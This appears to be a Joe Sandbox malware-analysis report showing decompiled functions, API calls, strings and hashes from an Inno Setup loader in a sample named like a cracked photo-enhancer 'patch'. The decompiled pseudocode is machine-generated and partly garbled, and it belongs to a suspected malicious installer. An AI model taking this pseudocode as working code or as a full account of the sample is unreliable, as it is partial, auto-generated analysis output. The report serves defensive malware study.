0x00404900
0x00404903
0x00404910

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00404911,?,?,?,?,00000000,?,0040AAF0), ref: 0040466F
GetVersion.KERNEL32(kernel32.dll,00000000,00404911,?,?,?,?,00000000,?,0040AAF0), ref: 00404676
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0040468B
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004046B3
GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004048D8
GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004048EE
SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,kernel32.dll,00000000,00404911,?,?,?,?,00000000,?,0040AAF0), ref: 004048F9

Strings

profapi.dll, xrefs: 00404857
kernel32.dll, xrefs: 0040466A
propsys.dll, xrefs: 004047A8
SetSearchPathMode, xrefs: 004048D2
version.dll, xrefs: 00404834
userenv.dll, xrefs: 0040473F
setupapi.dll, xrefs: 00404762
clbcatq.dll, xrefs: 0040489D
SetDllDirectoryW, xrefs: 004046AD
uxtheme.dll, xrefs: 0040471C
cryptbase.dll, xrefs: 004047EE
SetDefaultDllDirectories, xrefs: 00404685
comres.dll, xrefs: 0040487A
apphelp.dll, xrefs: 00404785
oleacc.dll, xrefs: 00404811
SetProcessDEPPolicy, xrefs: 004048E8
ntmarta.dll, xrefs: 004048C0
dwmapi.dll, xrefs: 004047CB

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$HandleModulePolicyProcessVersion
String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
API String ID: 3297890031-1119018034
Opcode ID: cc6ab64b48d02d140d73cec505fdc132eff82ff6553fc21a046d343f04ece132
Instruction ID: 8135fb14ee81180893b1f543c3a29e932c16cf19254b5bff3906bd7e71ea8aa3
Opcode Fuzzy Hash: cc6ab64b48d02d140d73cec505fdc132eff82ff6553fc21a046d343f04ece132
Instruction Fuzzy Hash: 9D611270600159AFDB00FBF6DA8398E77A89F80305B2045BBA604772D6D778EF059B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A050 Relevance: 7.6, APIs: 5, Instructions: 78
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040A050(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				long _t17;
				long _t20;
				int _t23;
				void* _t33;
				void* _t34;
				struct _MEMORY_BASIC_INFORMATION* _t35;
				void* _t36;
				DWORD* _t37;

				_t34 = __eax;
				_t35 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t17 = VirtualQuery(_t34, _t35, 0x1c);
				if(_t17 == 0) {
					L17:
					return _t17;
				} else {
					while(1) {
						_t17 = _t35->AllocationBase;
						if(_t17 != _t34) {
							goto L17;
						}
						if(_t35->State != 0x1000 || (_t35->Protect & 0x00000001) != 0) {
							L15:
							_t17 = VirtualQuery(_t35->BaseAddress + _t35->RegionSize, _t35, 0x1c);
							if(_t17 == 0) {
								goto L17;
							}
							continue;
						} else {
							_t33 = 0;
							_t20 = _t35->Protect;
							if(_t20 == 1 || _t20 == 2 || _t20 == 0x10 || _t20 == 0x20) {
								_t23 = VirtualProtect(_t35->BaseAddress, _t35->RegionSize, 0x40, _t37); // executed
								if(_t23 != 0) {
									_t33 = 1;
								}
							}
							_t36 = 0;
							while(_t36 < _t35->RegionSize) {
								E0040A048(_t35->BaseAddress + _t36);
								_t36 = _t36 + _v80.dwPageSize;
							}
							if(_t33 != 0) {
								VirtualProtect( *_t35, _t35->RegionSize, _v84, _t37); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}

0x0040a057
0x0040a059
0x0040a062
0x0040a06d
0x0040a074
0x0040a10b
0x0040a10b
0x0040a07a
0x0040a0f9
0x0040a0f9
0x0040a0fe
0x00000000
0x00000000
0x0040a083
0x0040a0e5
0x0040a0f0
0x0040a0f7
0x00000000
0x00000000
0x00000000
0x0040a08b
0x0040a08b
0x0040a08d
0x0040a093
0x0040a0ae
0x0040a0b5
0x0040a0b7
0x0040a0b7
0x0040a0b5
0x0040a0b9
0x0040a0ca
0x0040a0c1
0x0040a0c6
0x0040a0c6
0x0040a0d1
0x0040a0e0
0x0040a0e0
0x00000000
0x0040a0d1
0x0040a083
0x00000000
0x0040a0f9

APIs

GetSystemInfo.KERNEL32(?), ref: 0040A062
VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 0040A06D
VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 0040A0AE
VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 0040A0E0
VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 0040A0F0

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Virtual$ProtectQuery$InfoSystem
String ID:
API String ID: 2441996862-0
Opcode ID: e53a58f787b0994d942b1301a25b776e5790cc469dae4f0c0141b44a09a1105d
Instruction ID: d22f8a83843956dcd0f1bd3c30f31cd8ee5be065fb893754064b45e2edc0d12d
Opcode Fuzzy Hash: e53a58f787b0994d942b1301a25b776e5790cc469dae4f0c0141b44a09a1105d
Instruction Fuzzy Hash: 8921AEB12003086BD630DE998D85E6BB3D8DF85354F04483AF685E33C2D77DE864966A

Uniqueness

Uniqueness Score: -1.00%

Function 00405694 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405694(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E0040322C(_t10, _t18);
				}
				return E00403278(_t10, _t5 - 1,  &_v260, _t19);
			}

0x0040569f
0x004056a1
0x004056b2
0x004056b7
0x004056b9
0x00000000
0x004056d1
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040D4C0,00000001,?,0040575F,?,00000000,0040583E), ref: 004056B2

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 1c8cef5e7bc5498290c3f938cca84698e8f49793df951a569bfd97285a3601f8
Instruction ID: 16534491fad4532095b25154bcfa4eb159586e841354a195c3175f568a425c49
Opcode Fuzzy Hash: 1c8cef5e7bc5498290c3f938cca84698e8f49793df951a569bfd97285a3601f8
Instruction Fuzzy Hash: 4DE0D87170021827D710A9699C86EFB725CE758310F4006BFB908E73C2EDB59E8046ED

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF8D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E0040AF8D(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t22;
				struct HWND__* _t23;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t28;
				intOrPtr _t30;
				void* _t41;
				intOrPtr _t43;
				intOrPtr _t46;
				int _t47;
				intOrPtr _t48;
				intOrPtr _t50;
				struct HWND__* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t86;

				_t84 = __esi;
				_t83 = __edi;
				_t67 = __ecx;
				_t66 = __ebx;
				_t22 = _t86;
				if(__eflags >= 0) {
					 *((intOrPtr*)(_t85 - 0x74ffbf51)) =  *((intOrPtr*)(_t85 - 0x74ffbf51)) + __edx;
					_t89 = _t22 + 0x00000001 | 0x00000050;
					SetLastError(??);
					E00409B20(0x69, __ebx, _t67, __edi, __esi, _t22 + 0x00000001 | 0x00000050);
					E00402F24();
					E00407444(0x40de34);
					_push(0);
					_t65 =  *0x40d014; // 0x400000
					_push(_t65);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push("InnoSetupLdrWindow");
					_push("STATIC");
				}
				_t23 = CreateWindowExA(); // executed
				 *0x40c248 = _t23;
				_t24 =  *0x40c248; // 0x303b2
				 *0x40de2c = SetWindowLongA(_t24, 0xfffffffc, E00409E38);
				_t27 =  *0x40c248; // 0x303b2
				 *(_t85 - 0x3c) = _t27;
				 *((char*)(_t85 - 0x38)) = 0;
				_t28 =  *0x40de3c; // 0x420f3c
				_t8 = _t28 + 0x20; // 0x1b400
				 *((intOrPtr*)(_t85 - 0x34)) =  *_t8;
				 *((char*)(_t85 - 0x30)) = 0;
				_t30 =  *0x40de3c; // 0x420f3c
				_t11 = _t30 + 0x24; // 0x1b400
				 *((intOrPtr*)(_t85 - 0x2c)) =  *_t11;
				 *((char*)(_t85 - 0x28)) = 0;
				E0040561C("/SL5=\"$%x,%d,%d,", 2, _t85 - 0x3c, _t85 - 0x10);
				_t76 =  *0x40de30; // 0x21c03cc
				E004032FC(_t85 - 0x10, _t76);
				E004032FC(_t85 - 0x10, 0x40b204);
				_push(_t85 - 0x10);
				E00407004(_t85 - 0x24, _t66, 2, _t83, _t84, _t89);
				_pop(_t41);
				E004032FC(_t41,  *((intOrPtr*)(_t85 - 0x24)));
				_t43 =  *0x40de48; // 0x21c2f18, executed
				E00409EC4(_t43, _t66, 0x40c244,  *((intOrPtr*)(_t85 - 0x10)), _t83, _t84, _t89); // executed
				if( *0x40c240 != 0xffffffff) {
					_t57 =  *0x40c240; // 0x0
					E00409DA4(_t57, 0x40c244);
				}
				_pop(_t80);
				 *[fs:eax] = _t80;
				_push(E0040B12C);
				_t46 =  *0x40de34; // 0x0
				_t47 = E00402924(_t46);
				if( *0x40de48 != 0) {
					_t82 =  *0x40de48; // 0x21c2f18
					_t47 = E004099B0(0, _t82, 0xfa, 0x32);
				}
				if( *0x40de40 != 0) {
					_t54 =  *0x40de40; // 0x21c2de4
					_t47 = RemoveDirectoryA(E00403414(_t54));
				}
				if( *0x40c248 != 0) {
					_t53 =  *0x40c248; // 0x303b2
					_t47 = DestroyWindow(_t53);
				}
				if( *0x40de24 != 0) {
					_t48 =  *0x40de24; // 0x22076a0
					_t72 =  *0x40de28; // 0x1b
					E0040357C(_t48, _t66, _t72, E004090C4, _t83, _t84);
					_t50 =  *0x40de24; // 0x22076a0
					E004025AC(_t50);
					 *0x40de24 = 0;
					return 0;
				}
				return _t47;
			}

0x0040af8d
0x0040af8d
0x0040af8d
0x0040af8d
0x0040af8d
0x0040af8e
0x0040af90
0x0040af97
0x0040af99
0x0040afa0
0x0040afa5
0x0040afaf
0x0040afb4
0x0040afb6
0x0040afbb
0x0040afbc
0x0040afbe
0x0040afc0
0x0040afc2
0x0040afc4
0x0040afc6
0x0040afc8
0x0040afca
0x0040afcf
0x0040afcf
0x0040afd6
0x0040afdb
0x0040afe7
0x0040aff2
0x0040affb
0x0040b000
0x0040b003
0x0040b007
0x0040b00c
0x0040b00f
0x0040b012
0x0040b016
0x0040b01b
0x0040b01e
0x0040b021
0x0040b032
0x0040b03a
0x0040b040
0x0040b04d
0x0040b055
0x0040b059
0x0040b061
0x0040b062
0x0040b06f
0x0040b074
0x0040b080
0x0040b082
0x0040b087
0x0040b087
0x0040b08e
0x0040b091
0x0040b094
0x0040b099
0x0040b09e
0x0040b0aa
0x0040b0b8
0x0040b0c0
0x0040b0c0
0x0040b0cc
0x0040b0ce
0x0040b0d9
0x0040b0d9
0x0040b0e5
0x0040b0e7
0x0040b0ed
0x0040b0ed
0x0040b0f9
0x0040b0fb
0x0040b100
0x0040b10b
0x0040b110
0x0040b115
0x0040b11c
0x00000000
0x0040b11c
0x0040b121

APIs

SetLastError.KERNEL32 ref: 0040AF99

Part of subcall function 00409B20: GetLastError.KERNEL32(00000000,00409BC3,?,0040C244,?,021C2F18), ref: 00409B44

CreateWindowExA.USER32 ref: 0040AFD6
SetWindowLongA.USER32 ref: 0040AFED
RemoveDirectoryA.KERNEL32(00000000,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040B0D9
DestroyWindow.USER32(000303B2,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040B0ED

Strings

InnoSetupLdrWindow, xrefs: 0040AFCA
/SL5="$%x,%d,%d,, xrefs: 0040B02D
STATIC, xrefs: 0040AFCF

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3757039580-3001827809
Opcode ID: 779aa3cc042d1ecda5eecd5a957243857221684a4f0e841bdcf92309e10b5571
Instruction ID: e11106d591c480187276ddc099787e7d0131364ad6526c401ab361da32b03a0a
Opcode Fuzzy Hash: 779aa3cc042d1ecda5eecd5a957243857221684a4f0e841bdcf92309e10b5571
Instruction Fuzzy Hash: AB412F70E006049BD711EBE9EE86B6937A4EB58304F10417BF114BB2E2C7B89C05CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409558 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00409558(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _t13;
				intOrPtr _t36;
				intOrPtr _t42;

				_t27 = __ebx;
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t42);
				_push(0x409616);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				 *0x40dcd4 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64DisableWow64FsRedirection");
				 *0x40dcd8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "Wow64RevertWow64FsRedirection");
				if( *0x40dcd4 == 0 ||  *0x40dcd8 == 0) {
					_t13 = 0;
				} else {
					_t13 = 1;
				}
				 *0x40dcdc = _t13;
				E0040717C( &_v12);
				E00406AC0(_v12,  &_v8);
				E004032FC( &_v8, "shell32.dll");
				E00407454(_v8, _t27, 0x8000); // executed
				E00407738(0x4c783afb,  &_v8);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E0040961D);
				return E004031B8( &_v12, 2);
			}

0x00409558
0x0040955b
0x0040955d
0x0040955f
0x00409564
0x00409565
0x0040956a
0x0040956d
0x00409585
0x0040959f
0x004095ab
0x004095b6
0x004095ba
0x004095ba
0x004095ba
0x004095bc
0x004095c4
0x004095cf
0x004095dc
0x004095e9
0x004095f6
0x004095fd
0x00409600
0x00409603
0x00409615

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409616,?,?,?,?,00000000,00000000,?,0040AB04), ref: 0040957A
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00409580
GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00409616,?,?,?,?,00000000,00000000,?,0040AB04), ref: 00409594
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040959A

Strings

shell32.dll, xrefs: 004095D7
Wow64RevertWow64FsRedirection, xrefs: 0040958A
kernel32.dll, xrefs: 00409575, 0040958F
Wow64DisableWow64FsRedirection, xrefs: 00409570

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
API String ID: 1646373207-2130885113
Opcode ID: a877c76c9fc41a234e825ecf500836d7dc2a3ebdee614a9ba8f5c15843239161
Instruction ID: a26a6a73124c26f393fcd3150f7a0ae21a729c0721f3e308dc05a8b68c4216e4
Opcode Fuzzy Hash: a877c76c9fc41a234e825ecf500836d7dc2a3ebdee614a9ba8f5c15843239161
Instruction Fuzzy Hash: AD119170908244BEDB00FBA6CD02B497BA8DB85704F20447BB500762D3CA7D5D08DA2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF7A Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 105
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E0040AF7A(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr _t21;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				struct HWND__* _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				intOrPtr _t65;
				intOrPtr _t67;
				intOrPtr _t69;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t79;

				_t79 = __eflags;
				_t77 = __esi;
				_t76 = __edi;
				_t58 = __ebx;
				_pop(_t67);
				 *[fs:eax] = _t67;
				E00407444(0x40de34);
				_push(0);
				_t21 =  *0x40d014; // 0x400000
				_push(_t21);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push("InnoSetupLdrWindow");
				_push("STATIC");
				_t22 = CreateWindowExA(); // executed
				 *0x40c248 = _t22;
				_t23 =  *0x40c248; // 0x303b2
				 *0x40de2c = SetWindowLongA(_t23, 0xfffffffc, E00409E38);
				_t26 =  *0x40c248; // 0x303b2
				 *(_t78 - 0x3c) = _t26;
				 *((char*)(_t78 - 0x38)) = 0;
				_t27 =  *0x40de3c; // 0x420f3c
				_t5 = _t27 + 0x20; // 0x1b400
				 *((intOrPtr*)(_t78 - 0x34)) =  *_t5;
				 *((char*)(_t78 - 0x30)) = 0;
				_t29 =  *0x40de3c; // 0x420f3c
				_t8 = _t29 + 0x24; // 0x1b400
				 *((intOrPtr*)(_t78 - 0x2c)) =  *_t8;
				 *((char*)(_t78 - 0x28)) = 0;
				E0040561C("/SL5=\"$%x,%d,%d,", 2, _t78 - 0x3c, _t78 - 0x10);
				_t69 =  *0x40de30; // 0x21c03cc
				E004032FC(_t78 - 0x10, _t69);
				E004032FC(_t78 - 0x10, 0x40b204);
				_push(_t78 - 0x10);
				E00407004(_t78 - 0x24, __ebx, 2, __edi, __esi, _t79);
				_pop(_t40);
				E004032FC(_t40,  *((intOrPtr*)(_t78 - 0x24)));
				_t42 =  *0x40de48; // 0x21c2f18, executed
				E00409EC4(_t42, __ebx, 0x40c244,  *((intOrPtr*)(_t78 - 0x10)), __edi, __esi, _t79); // executed
				if( *0x40c240 != 0xffffffff) {
					_t56 =  *0x40c240; // 0x0
					E00409DA4(_t56, 0x40c244);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E0040B12C);
				_t45 =  *0x40de34; // 0x0
				_t46 = E00402924(_t45);
				if( *0x40de48 != 0) {
					_t75 =  *0x40de48; // 0x21c2f18
					_t46 = E004099B0(0, _t75, 0xfa, 0x32);
				}
				if( *0x40de40 != 0) {
					_t53 =  *0x40de40; // 0x21c2de4
					_t46 = RemoveDirectoryA(E00403414(_t53));
				}
				if( *0x40c248 != 0) {
					_t52 =  *0x40c248; // 0x303b2
					_t46 = DestroyWindow(_t52);
				}
				if( *0x40de24 != 0) {
					_t47 =  *0x40de24; // 0x22076a0
					_t65 =  *0x40de28; // 0x1b
					E0040357C(_t47, _t58, _t65, E004090C4, _t76, _t77);
					_t49 =  *0x40de24; // 0x22076a0
					E004025AC(_t49);
					 *0x40de24 = 0;
					return 0;
				}
				return _t46;
			}

0x0040af7a
0x0040af7a
0x0040af7a
0x0040af7a
0x0040af7c
0x0040af7f
0x0040afaf
0x0040afb4
0x0040afb6
0x0040afbb
0x0040afbc
0x0040afbe
0x0040afc0
0x0040afc2
0x0040afc4
0x0040afc6
0x0040afc8
0x0040afca
0x0040afcf
0x0040afd6
0x0040afdb
0x0040afe7
0x0040aff2
0x0040affb
0x0040b000
0x0040b003
0x0040b007
0x0040b00c
0x0040b00f
0x0040b012
0x0040b016
0x0040b01b
0x0040b01e
0x0040b021
0x0040b032
0x0040b03a
0x0040b040
0x0040b04d
0x0040b055
0x0040b059
0x0040b061
0x0040b062
0x0040b06f
0x0040b074
0x0040b080
0x0040b082
0x0040b087
0x0040b087
0x0040b08e
0x0040b091
0x0040b094
0x0040b099
0x0040b09e
0x0040b0aa
0x0040b0b8
0x0040b0c0
0x0040b0c0
0x0040b0cc
0x0040b0ce
0x0040b0d9
0x0040b0d9
0x0040b0e5
0x0040b0e7
0x0040b0ed
0x0040b0ed
0x0040b0f9
0x0040b0fb
0x0040b100
0x0040b10b
0x0040b110
0x0040b115
0x0040b11c
0x00000000
0x0040b11c
0x0040b121

APIs

CreateWindowExA.USER32 ref: 0040AFD6
SetWindowLongA.USER32 ref: 0040AFED

Part of subcall function 00407004: GetCommandLineA.KERNEL32(00000000,00407048,?,?,?,?,00000000,?,0040B05E,?,?,000303B2,000000FC,00409E38,00000000,STATIC), ref: 0040701C

Part of subcall function 00409EC4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409FBC,021C2F18,00409FB0,00000000,00409F97), ref: 00409F34
Part of subcall function 00409EC4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409FBC,021C2F18,00409FB0,00000000), ref: 00409F48
Part of subcall function 00409EC4: MsgWaitForMultipleObjects.USER32 ref: 00409F61
Part of subcall function 00409EC4: GetExitCodeProcess.KERNEL32 ref: 00409F73
Part of subcall function 00409EC4: CloseHandle.KERNEL32(?,?,0040C244,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409F7C

RemoveDirectoryA.KERNEL32(00000000,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040B0D9
DestroyWindow.USER32(000303B2,0040B12C,00409E38,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040B0ED

Strings

InnoSetupLdrWindow, xrefs: 0040AFCA
/SL5="$%x,%d,%d,, xrefs: 0040B02D
STATIC, xrefs: 0040AFCF

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
API String ID: 3586484885-3001827809
Opcode ID: 2e3aa86d138e90c5b86658206792da66739f20ef7896738f1a5b938c9a18691c
Instruction ID: 2c50bf805cbcaae07aef26e9318175051bf4a01897437c95b2245b611fc910e4
Opcode Fuzzy Hash: 2e3aa86d138e90c5b86658206792da66739f20ef7896738f1a5b938c9a18691c
Instruction Fuzzy Hash: A6413B71A106049FD710EBE9EE96B6937E4EB58304F10427AF514BB2E1D7B89C04CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00409EC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00409EC4(void* __eax, void* __ebx, DWORD* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				struct _STARTUPINFOA _v76;
				void* _v88;
				void* _v92;
				int _t22;
				intOrPtr _t49;
				DWORD* _t51;
				void* _t56;

				_v8 = 0;
				_t51 = __ecx;
				_t53 = __edx;
				_t41 = __eax;
				_push(_t56);
				_push(0x409f97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t56 + 0xffffffa8;
				_push(0x409fb0);
				_push(__eax);
				_push(E00409FBC);
				_push(__edx);
				E004033B4();
				E0040277C( &_v76, 0x44);
				_v76.cb = 0x44;
				_t22 = CreateProcessA(0, E00403414(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92); // executed
				_t59 = _t22;
				if(_t22 == 0) {
					E00409B20(0x6a, _t41, 0, _t51, _t53, _t59);
				}
				CloseHandle(_v88);
				do {
					E00409E98();
				} while (MsgWaitForMultipleObjects(1,  &_v92, 0, 0xffffffff, 0xff) == 1);
				E00409E98();
				GetExitCodeProcess(_v92, _t51);
				CloseHandle(_v92);
				_pop(_t49);
				 *[fs:eax] = _t49;
				_push(E00409F9E);
				return E00403198( &_v8);
			}

0x00409ecf
0x00409ed2
0x00409ed4
0x00409ed6
0x00409eda
0x00409edb
0x00409ee0
0x00409ee3
0x00409ee6
0x00409eeb
0x00409eec
0x00409ef1
0x00409efa
0x00409f09
0x00409f0e
0x00409f34
0x00409f39
0x00409f3b
0x00409f3f
0x00409f3f
0x00409f48
0x00409f4d
0x00409f4d
0x00409f66
0x00409f69
0x00409f73
0x00409f7c
0x00409f83
0x00409f86
0x00409f89
0x00409f96

APIs

CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409FBC,021C2F18,00409FB0,00000000,00409F97), ref: 00409F34
CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409FBC,021C2F18,00409FB0,00000000), ref: 00409F48
MsgWaitForMultipleObjects.USER32 ref: 00409F61
GetExitCodeProcess.KERNEL32 ref: 00409F73
CloseHandle.KERNEL32(?,?,0040C244,00000001,?,00000000,000000FF,000000FF,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409F7C

Part of subcall function 00409B20: GetLastError.KERNEL32(00000000,00409BC3,?,0040C244,?,021C2F18), ref: 00409B44

Strings

D, xrefs: 00409F0E

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
